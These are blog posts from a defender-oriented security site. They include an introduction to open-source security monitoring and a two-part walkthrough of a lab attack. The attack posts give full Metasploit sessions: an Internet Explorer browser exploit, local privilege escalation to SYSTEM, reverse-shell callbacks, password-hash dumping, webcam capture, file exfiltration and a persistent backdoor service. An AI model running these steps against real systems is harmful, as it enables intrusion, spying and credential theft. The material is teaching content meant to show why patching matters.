OSM: Open Security Monitoring

Introduction

I’ve spent most of my career defending environments of all sizes.  What I’ve found is that the job of a defender is much less flashier and thankless as compared to an “ethical hacker.”  While there are volumes of articles, guides, and talks on penetration testing and the latest attacks, there isn’t much on defending or security monitoring.  With plenty of free tools and exploits for attackers (such as the venerable Kali Linux), there doesn’t seem to be as much excitement for building similar tools for defenders.  In fact, there’s a notion that in order to properly defend a network, you must spend thousands or even millions of dollars.

Enter “Open Security Monitoring”, or “OSM”, which I refer to as a system of integrated open source security tools working together to secure networks of all sizes and all budgets.  Why open source?  There are three specific advantages:

  • Cost: Open source security tools are freely available for anyone to download and install.  This makes the barrier to entry much lower for convincing management to implement these tools.
  • Transparency: The source code can be viewed and edited by anyone, making it clear how it works.  If it doesn’t do something you want it to do, you’re free to modify the code to fit your needs.  I’ve always found the best way to learn and understand something is to take it apart and look at how all the pieces work together.  It’s no different with security tools.
  • Quality: Just because it’s open source and “free”, doesn’t mean it’s a lesser tool than something costing thousands of dollars.  In fact, many are better than anything commercially available because they’re built and supported by a passionate community that isn’t looking to simply make the next big sale.

In this series, I will walk through key OSM components and the relevant tools I’ve used to defend real-world environments:

  • Intrusion Detection/Prevention System
  • Network Security Monitoring
  • Host Intelligence
  • Security Analytics

You could certainly achieve this without using open source tools, but the point here is that you can build a robust security monitoring architecture with limited financial resources.  And if you have some money to spend, open source security tools complement commercial systems well.  Each environment is unique and you’ll likely have a mix of open source and commercial products.

What’s Next

We’ve defined the concept of Open Security Monitoring and why there is a need for open source security tools.  Next, we’ll explore the first of four OSM components, intrusion detection/prevention systems.

Facebooktwittergoogle_plusredditpinterestlinkedintumblrmailFacebooktwittergoogle_plusredditpinterestlinkedintumblrmail

Seeing Red: The Fun Stuff

The Fun Stuff: Privilege Escalation, Exfiltration, and Persistence

This is part of a series of posts that walk through an attack.  To start from the beginning, click here.

In the last post, we successfully exploited our Victim using a client-side attack targeting an old version of Microsoft Internet Explorer.  We ended with a Meterpreter session confirming our access to the Victim machine.  In this part, we’ll explore the capabilities of Meterpreter including privilege escalation and data exfiltration.

Privilege Escalation

We talked a bit about Meterpreter in the last post, now let’s play with some of its many functions.  Our Meterpreter session is now running under the Notepad process as the lower-privileged “eric” user.  We want to escalate our privileges to give us enhanced system functionality.  In Windows, the highest user is “SYSTEM”.

Meterpreter has a built-in “getsystem” command that will attempt to use various techniques to elevate our user to SYSTEM.  Let’s give it a try.

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.

Hmm, no luck.  No worries, let’s try a local exploit.  MS14-058 seems like a good one.

meterpreter > background
Backgrounding session 1...
msf exploit(ms13_037_svg_dashstyle) > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > set SESSION 1
SESSION => 1
msf exploit(ms14_058_track_popup_menu) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms14_058_track_popup_menu) > set LHOST 10.0.1.10
LHOST => 10.0.1.10
msf exploit(ms14_058_track_popup_menu) > set LPORT 5555
LPORT => 5555
msf exploit(ms14_058_track_popup_menu) > exploit
[*] Started reverse handler on 10.0.1.10:5555
[*] Launching notepad to host the exploit...
[+] Process 1556 launched.
[*] Reflectively injecting the exploit DLL into 1556...
[*] Injecting exploit into 1556...
[*] Exploit injected. Injecting payload into 1556...
[*] Payload injected. Executing exploit...
[*] Sending stage (770048 bytes) to 10.0.1.11
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened (10.0.1.10:5555 -> 10.0.1.11:49209) at 2015-07-26 17:04:37 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Success!  We’re now running as SYSTEM.

A Litte Bit of Fun

So now what?  The first thing an attacker will likely do is dump password hashes.  This is easy to do with Meterpreter.  These hashes can the be cracked offline giving us, the Attacker, passwords to try on Victim online accounts.

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
eric:1000:aad3b435b51404eeaad3b435b51404ee:7a08e99f765c50c0f1768692200e6db5:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

How about a screenshot of the desktop?

meterpreter > screenshot
Screenshot saved to: /root/mUSXxVRT.jpeg

exploit_screenshot

Got a webcam? Let’s take a picture and stream some video!

meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/SCCMCDyI.jpeg

meterpreter > webcam_stream
[*] Starting...
[*] Preparing player...
[*] Opening player at: zwuaLciW.html
[*] Streaming...

What files are on the system?  Perhaps a password file…

meterpreter > ls

Listing: c:\Users\eric\Desktop
==============================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40555/r-xr-xr-x 0 dir 2015-07-26 17:13:01 -0500 .
40777/rwxrwxrwx 0 dir 2014-11-11 19:36:51 -0600 ..
100666/rw-rw-rw- 282 fil 2014-11-11 20:06:50 -0600 desktop.ini
100666/rw-rw-rw- 113 fil 2015-07-26 17:12:27 -0500 my_passwords.txt

meterpreter > cat my_passwords.txt
Top Secret Passwords
+ Bank: no-one-will-guess-this-password
+ Email: password!@#$
+ Amazon: shoptilyoudrop192

meterpreter > download my_passwords.txt
[*] downloading: my_passwords.txt -> my_passwords.txt
[*] downloaded : my_passwords.txt -> my_passwords.txt

This is but a small sampling of the many commands Meterpreter provides.  Play with the other commands to see what else Meterpreter can do.

Persistence

Now that we’ve compromised our Victim machine, let’s install a persistent backdoor that allows us back in even if the machine is restarted.  To do this, we’ll generate a backdoor that autostarts and periodically calls back to our Attacker machine.

meterpreter > run persistence -S -i 5 -p 1337 -r 10.0.1.10
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-FDN9DNVQ5IR_20150726.4130/WIN-FDN9DNVQ5IR_20150726.4130.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=10.0.1.10 LPORT=1337
[*] Persistent agent script is 148420 bytes long
[+] Persistent Script written to C:\Users\eric\AppData\Local\Temp\vkPiHmUdoG.vbs
[*] Executing script C:\Users\eric\AppData\Local\Temp\vkPiHmUdoG.vbs
[+] Agent executed with PID 2008
[*] Installing as service..
[*] Creating service dexYVTDwgSWcORt

Back on our Attacker machine, we’ll setup a Meterpreter handler to accept any incoming connections from our Victim machine.

msf exploit(ms14_058_track_popup_menu) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.0.1.10
LHOST => 10.0.1.10
msf exploit(handler) > set LPORT 1337
LPORT => 1337

Run the handler on the Attacker and restart the Victim machine. If all goes well we should be reconnected as SYSTEM.

msf exploit(handler) > exploit
[*] Started reverse handler on 10.0.1.10:1337
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 10.0.1.11
[*] Meterpreter session 7 opened (10.0.1.10:1337 -> 10.0.1.11:49161) at 2015-07-26 17:47:55 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Too easy!

Conclusion

Throughout this series we’ve walked through a typical client-side attack.  We started with a basic understanding of penetration testing tools and what is commonly used.  We performed reconnaissance on our Victim machine and determined what vulnerable software could be exploited.  We then set up a client-side attack and compromised our Victim machine, gaining low-privilege access.  Finally, we executed a local privilege escalation exploit to gain SYSTEM privileges, used Meterpreter to demonstrate our control over the system including data exfiltration, and finally created a persistent backdoor so we can re-establish access at any time.

Hopefully, this has been an eye-opening experience to see just how easy it is to compromise a system and why it is so important to stay up to date with software patches and apply basic security principles.  In the next series, we’ll investigate how to detect malicious activity and defend a network using open source security tools.

Facebooktwittergoogle_plusredditpinterestlinkedintumblrmailFacebooktwittergoogle_plusredditpinterestlinkedintumblrmail

IP360 Tools: Free For All!

Last year, I wrote a couple articles on how to integrate Tripwire IP360 data into Splunk.  These turned out to be very popular, with a number of folks reaching out to me for a copy of my IP360 Tools script that made all the magic happen.  I hesitated to give the script out since it was originally developed while I was employed at a consulting firm and I wasn’t sure if it was truly mine to give.

However, I’ve always appreciated the free and open source community, especially within the security field.  My own career has benefitted greatly from the use of free open source software and it always made me uneasy that I wasn’t sharing the script.  I’ve since moved on from the consulting firm and they’ve given me permission to do as I please with the script.  Given this, I have decided to make the IP360 Tools script freely available (yay!).

Download IP360 Tools

The script is provided as-is and I offer no support (unless you’ve got some money to burn!).  I also have no plans to continue development.  You’re welcome to use and modify it in any way you see fit.

Enjoy and Happy New Year!

Facebooktwittergoogle_plusredditpinterestlinkedintumblrmailFacebooktwittergoogle_plusredditpinterestlinkedintumblrmail

Seeing Red: Exploitation

Exploitation: Client-side Attack

This is part of a series of posts that walk through an attack.  To start from the beginning, click here.

In the last post, we performed some basic reconnaissance on our target machine and determined its operating system, running services, and even what browser was used.  In this part, we’ll set up a client-side attack and gain access to our target machine.

In recent times, client-side attacks have become a very popular way of attacking a machine.  Client-side attacks differ from server-side attacks in that they require some kind of user interaction to successfully execute the exploit.  Phishing, where the sender poses as a legitimate entity that the receiver trusts to entice them into clicking a malicious link or opening a malicious file, is an example of a client-side attack.

We’ll explore setting up a malicious website that hosts our client-side attack.  This is easily accomplished with Kali using Metasploit.  If you recall in our scenario, the target machine, Victim, has joined our “free wireless network” that we have full control over.  This means we also have control over DNS and can redirect Victim to whichever site we please.  This is important in setting up our client-side attack.

Metasploit: MS13-037

The Metasploit Framework (MSF) is an amazing collection of exploits and payloads wrapped in an easy to use command line interface.  There exists a free community-driven version and a commercial paid version.  We’ll be using the free version in Kali to set up our client-side attack.

Since we know that Victim is running Internet Explorer 8, a very old web browser, we’ll look for a client-side attack that can take advantage of this.  After some research, we learn about MS13-037.  This was a Microsoft cumulative security patch for Internet Explorer which addressed several vulnerabilities, including CVE-2013-2551.  From the CVE database description, this is a “use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 [that] allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object.”

This sounds like something we can use.  Let’s see if Metasploit has an available exploit.  We prepare Metasploit for first use by following the instructions from the Kali website.  Open a terminal window and type msfconsole to start up the Metasploit Framework console.

root@kali:~# msfconsole
[*] Starting the Metasploit Framework console...\

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        http://metasploit.pro


Payload caught by AV? Fly under the radar with Dynamic Payloads in
Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.10.0-2014102901 [core:4.10.0.pre.2014102901 api:1.0.0]]
+ -- --=[ 1369 exploits - 833 auxiliary - 233 post        ]
+ -- --=[ 340 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > 

Now let’s search for an MS13-037 exploit by typing search ms13-037.

msf > search ms13-037

Matching Modules
================

   Name                                            Disclosure Date  Rank    Description
   ----                                            ---------------  ----    -----------
   exploit/windows/browser/ms13_037_svg_dashstyle  2013-03-06       normal  MS13-037 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow

msf > 

We’re in luck, Metasploit has an available exploit.  Type use exploit/windows/browser/ms13_037_svg_dashstyle to select the exploit and then type show options to view configurable options.

msf > use exploit/windows/browser/ms13_037_svg_dashstyle
msf exploit(ms13_037_svg_dashstyle) > show options

Module options (exploit/windows/browser/ms13_037_svg_dashstyle):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   OBFUSCATE   false            no        Enable JavaScript obfuscation
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  TLS1             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(ms13_037_svg_dashstyle) > 

This particular Metasploit attack creates a website that will deliver a malicious payload and give us access to our target machine.  The options shown above are specific to how we want to set up the malicious website.  We’ll leave most of these as default but change SRVPORT to 80 (this is the local port on our Attacker machine we want to listen on) and URIPATH to clickme (this is the URI path to use for serving the exploit).  To do this, we’ll type set SRVPORT 80 and set URIPATH clickme and then type show options to confirm the changes.

msf exploit(ms13_037_svg_dashstyle) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms13_037_svg_dashstyle) > set URIPATH clickme
URIPATH => clickme
msf exploit(ms13_037_svg_dashstyle) > show options

Module options (exploit/windows/browser/ms13_037_svg_dashstyle):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   OBFUSCATE   false            no        Enable JavaScript obfuscation
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  TLS1             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     clickme          no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Next, let’s configure the exploit target.  It is currently set to Automatic, however, I’ve found that sometimes this doesn’t always work.  Let’s see what targets are available by typing show targets and then configure a specific one for Metasploit to use by typing set target and the number of a specific option.  We’ll again type show options to confirm our changes.

msf exploit(ms13_037_svg_dashstyle) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   IE 8 on Windows 7 SP1 with JRE ROP
   2   IE 8 on Windows 7 SP1 with ntdll.dll Info Leak

msf exploit(ms13_037_svg_dashstyle) > set target 2
target => 2
msf exploit(ms13_037_svg_dashstyle) > show options

Module options (exploit/windows/browser/ms13_037_svg_dashstyle):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   OBFUSCATE   false            no        Enable JavaScript obfuscation
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  TLS1             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     clickme          no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   2   IE 8 on Windows 7 SP1 with ntdll.dll Info Leak

msf exploit(ms13_037_svg_dashstyle) > 

We set target to 2 since target 1 is for Internet Explorer with a JRE (Java Runtime Environment), which we don’t have.  So far so good, now let’s set up the malicious payload that will be delivered to the vulnerable client.  Type show payloads to view a list of payloads that are compatible with this exploit.

msf exploit(ms13_037_svg_dashstyle) > show payloads

Compatible Payloads
===================

   Name                                             Disclosure Date  Rank    Description
   ----                                             ---------------  ----    -----------
   generic/custom                                                    normal  Custom Payload
   generic/debug_trap                                                normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                                            normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                                         normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                                                normal  Generic x86 Tight Loop
   windows/dllinject/bind_ipv6_tcp                                   normal  Reflective DLL Injection, Bind TCP Stager (IPv6)
   windows/dllinject/bind_nonx_tcp                                   normal  Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
   windows/dllinject/bind_tcp                                        normal  Reflective DLL Injection, Bind TCP Stager
   windows/dllinject/bind_tcp_rc4                                    normal  Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption)
   windows/dllinject/reverse_hop_http                                normal  Reflective DLL Injection, Reverse Hop HTTP Stager
   windows/dllinject/reverse_http                                    normal  Reflective DLL Injection, Reverse HTTP Stager
   windows/dllinject/reverse_ipv6_tcp                                normal  Reflective DLL Injection, Reverse TCP Stager (IPv6)
   windows/dllinject/reverse_nonx_tcp                                normal  Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
   windows/dllinject/reverse_ord_tcp                                 normal  Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/dllinject/reverse_tcp                                     normal  Reflective DLL Injection, Reverse TCP Stager
   windows/dllinject/reverse_tcp_allports                            normal  Reflective DLL Injection, Reverse All-Port TCP Stager
   windows/dllinject/reverse_tcp_dns                                 normal  Reflective DLL Injection, Reverse TCP Stager (DNS)
   windows/dllinject/reverse_tcp_rc4                                 normal  Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption)
   windows/dllinject/reverse_tcp_rc4_dns                             normal  Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS)
   windows/dns_txt_query_exec                                        normal  DNS TXT Record Payload Download and Execution
   windows/download_exec                                             normal  Windows Executable Download (http,https,ftp) and Execute
   windows/exec                                                      normal  Windows Execute Command
   windows/loadlibrary                                               normal  Windows LoadLibrary Path
   windows/messagebox                                                normal  Windows MessageBox
   windows/meterpreter/bind_ipv6_tcp                                 normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
   windows/meterpreter/bind_nonx_tcp                                 normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
   windows/meterpreter/bind_tcp                                      normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager
   windows/meterpreter/bind_tcp_rc4                                  normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption)
   windows/meterpreter/reverse_hop_http                              normal  Windows Meterpreter (Reflective Injection), Reverse Hop HTTP Stager
   windows/meterpreter/reverse_http                                  normal  Windows Meterpreter (Reflective Injection), Reverse HTTP Stager
   windows/meterpreter/reverse_https                                 normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
   windows/meterpreter/reverse_https_proxy                           normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
   windows/meterpreter/reverse_ipv6_tcp                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
   windows/meterpreter/reverse_nonx_tcp                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_ord_tcp                               normal  Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_tcp                                   normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
   windows/meterpreter/reverse_tcp_allports                          normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
   windows/meterpreter/reverse_tcp_dns                               normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
   windows/meterpreter/reverse_tcp_rc4                               normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption)
   windows/meterpreter/reverse_tcp_rc4_dns                           normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS)
   windows/metsvc_bind_tcp                                           normal  Windows Meterpreter Service, Bind TCP
   windows/metsvc_reverse_tcp                                        normal  Windows Meterpreter Service, Reverse TCP Inline
   windows/patchupdllinject/bind_ipv6_tcp                            normal  Windows Inject DLL, Bind TCP Stager (IPv6)
   windows/patchupdllinject/bind_nonx_tcp                            normal  Windows Inject DLL, Bind TCP Stager (No NX or Win7)
   windows/patchupdllinject/bind_tcp                                 normal  Windows Inject DLL, Bind TCP Stager
   windows/patchupdllinject/bind_tcp_rc4                             normal  Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption)
   windows/patchupdllinject/reverse_ipv6_tcp                         normal  Windows Inject DLL, Reverse TCP Stager (IPv6)
   windows/patchupdllinject/reverse_nonx_tcp                         normal  Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_ord_tcp                          normal  Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_tcp                              normal  Windows Inject DLL, Reverse TCP Stager
   windows/patchupdllinject/reverse_tcp_allports                     normal  Windows Inject DLL, Reverse All-Port TCP Stager
   windows/patchupdllinject/reverse_tcp_dns                          normal  Windows Inject DLL, Reverse TCP Stager (DNS)
   windows/patchupdllinject/reverse_tcp_rc4                          normal  Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption)
   windows/patchupdllinject/reverse_tcp_rc4_dns                      normal  Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS)
   windows/patchupmeterpreter/bind_ipv6_tcp                          normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (IPv6)
   windows/patchupmeterpreter/bind_nonx_tcp                          normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/bind_tcp                               normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager
   windows/patchupmeterpreter/bind_tcp_rc4                           normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption)
   windows/patchupmeterpreter/reverse_ipv6_tcp                       normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
   windows/patchupmeterpreter/reverse_nonx_tcp                       normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_ord_tcp                        normal  Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_tcp                            normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
   windows/patchupmeterpreter/reverse_tcp_allports                   normal  Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
   windows/patchupmeterpreter/reverse_tcp_dns                        normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
   windows/patchupmeterpreter/reverse_tcp_rc4                        normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption)
   windows/patchupmeterpreter/reverse_tcp_rc4_dns                    normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS)
   windows/shell/bind_ipv6_tcp                                       normal  Windows Command Shell, Bind TCP Stager (IPv6)
   windows/shell/bind_nonx_tcp                                       normal  Windows Command Shell, Bind TCP Stager (No NX or Win7)
   windows/shell/bind_tcp                                            normal  Windows Command Shell, Bind TCP Stager
   windows/shell/bind_tcp_rc4                                        normal  Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption)
   windows/shell/reverse_hop_http                                    normal  Windows Command Shell, Reverse Hop HTTP Stager
   windows/shell/reverse_http                                        normal  Windows Command Shell, Reverse HTTP Stager
   windows/shell/reverse_ipv6_tcp                                    normal  Windows Command Shell, Reverse TCP Stager (IPv6)
   windows/shell/reverse_nonx_tcp                                    normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   windows/shell/reverse_ord_tcp                                     normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/shell/reverse_tcp                                         normal  Windows Command Shell, Reverse TCP Stager
   windows/shell/reverse_tcp_allports                                normal  Windows Command Shell, Reverse All-Port TCP Stager
   windows/shell/reverse_tcp_dns                                     normal  Windows Command Shell, Reverse TCP Stager (DNS)
   windows/shell/reverse_tcp_rc4                                     normal  Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption)
   windows/shell/reverse_tcp_rc4_dns                                 normal  Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS)
   windows/shell_bind_tcp                                            normal  Windows Command Shell, Bind TCP Inline
   windows/shell_bind_tcp_xpfw                                       normal  Windows Disable Windows ICF, Command Shell, Bind TCP Inline
   windows/shell_hidden_bind_tcp                                     normal  Windows Command Shell, Hidden Bind TCP Inline
   windows/shell_reverse_tcp                                         normal  Windows Command Shell, Reverse TCP Inline
   windows/speak_pwned                                               normal  Windows Speech API - Say "You Got Pwned!"
   windows/upexec/bind_ipv6_tcp                                      normal  Windows Upload/Execute, Bind TCP Stager (IPv6)
   windows/upexec/bind_nonx_tcp                                      normal  Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
   windows/upexec/bind_tcp                                           normal  Windows Upload/Execute, Bind TCP Stager
   windows/upexec/bind_tcp_rc4                                       normal  Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption)
   windows/upexec/reverse_hop_http                                   normal  Windows Upload/Execute, Reverse Hop HTTP Stager
   windows/upexec/reverse_http                                       normal  Windows Upload/Execute, Reverse HTTP Stager
   windows/upexec/reverse_ipv6_tcp                                   normal  Windows Upload/Execute, Reverse TCP Stager (IPv6)
   windows/upexec/reverse_nonx_tcp                                   normal  Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
   windows/upexec/reverse_ord_tcp                                    normal  Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/upexec/reverse_tcp                                        normal  Windows Upload/Execute, Reverse TCP Stager
   windows/upexec/reverse_tcp_allports                               normal  Windows Upload/Execute, Reverse All-Port TCP Stager
   windows/upexec/reverse_tcp_dns                                    normal  Windows Upload/Execute, Reverse TCP Stager (DNS)
   windows/upexec/reverse_tcp_rc4                                    normal  Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption)
   windows/upexec/reverse_tcp_rc4_dns                                normal  Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS)
   windows/vncinject/bind_ipv6_tcp                                   normal  VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
   windows/vncinject/bind_nonx_tcp                                   normal  VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
   windows/vncinject/bind_tcp                                        normal  VNC Server (Reflective Injection), Bind TCP Stager
   windows/vncinject/bind_tcp_rc4                                    normal  VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption)
   windows/vncinject/reverse_hop_http                                normal  VNC Server (Reflective Injection), Reverse Hop HTTP Stager
   windows/vncinject/reverse_http                                    normal  VNC Server (Reflective Injection), Reverse HTTP Stager
   windows/vncinject/reverse_ipv6_tcp                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
   windows/vncinject/reverse_nonx_tcp                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/vncinject/reverse_ord_tcp                                 normal  VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/vncinject/reverse_tcp                                     normal  VNC Server (Reflective Injection), Reverse TCP Stager
   windows/vncinject/reverse_tcp_allports                            normal  VNC Server (Reflective Injection), Reverse All-Port TCP Stager
   windows/vncinject/reverse_tcp_dns                                 normal  VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
   windows/vncinject/reverse_tcp_rc4                                 normal  VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption)
   windows/vncinject/reverse_tcp_rc4_dns                             normal  VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS)

msf exploit(ms13_037_svg_dashstyle) > 

Wow, so many options!  My personal favorite has always been the Windows Meterpreter (Reflective Injection), Reverse TCP Stager.  Meterpreter is an amazing payload that provides a whole host of options.  From the Metasploit Unleashed tutorial:

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

I like the Reverse TCP Stager because this will open a Meterpreter session on Victim that is then sent directly back to us.  Because Victim is making the outbound connection to our Attacker machine and because most firewalls don’t block outbound connections by default, our newly created Meterpreter session will be sent back to us without being blocked by Victim’s firewall.  This is as opposed to the Bind TCP Stager which would also open a Meterpreter session on the Victim, but it would not send this session directly back to us.  Instead, the Meterpreter session on Victim would be configured to listen for connections from our Attacker.  Meaning, we’d have to make an outbound connection directly from our Attacker machine to Victim’s listening Meterpreter session.  Since most firewalls deny all by default, this connection would likely be blocked by Victim’s firewall.

All that said, let’s go ahead and use this payload by typing set payload windows/meterpreter/reverse_tcp.  Then type show options to see what payload options are configurable.

msf exploit(ms13_037_svg_dashstyle) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms13_037_svg_dashstyle) > show options

Module options (exploit/windows/browser/ms13_037_svg_dashstyle):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   OBFUSCATE   false            no        Enable JavaScript obfuscation
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  TLS1             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     clickme          no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
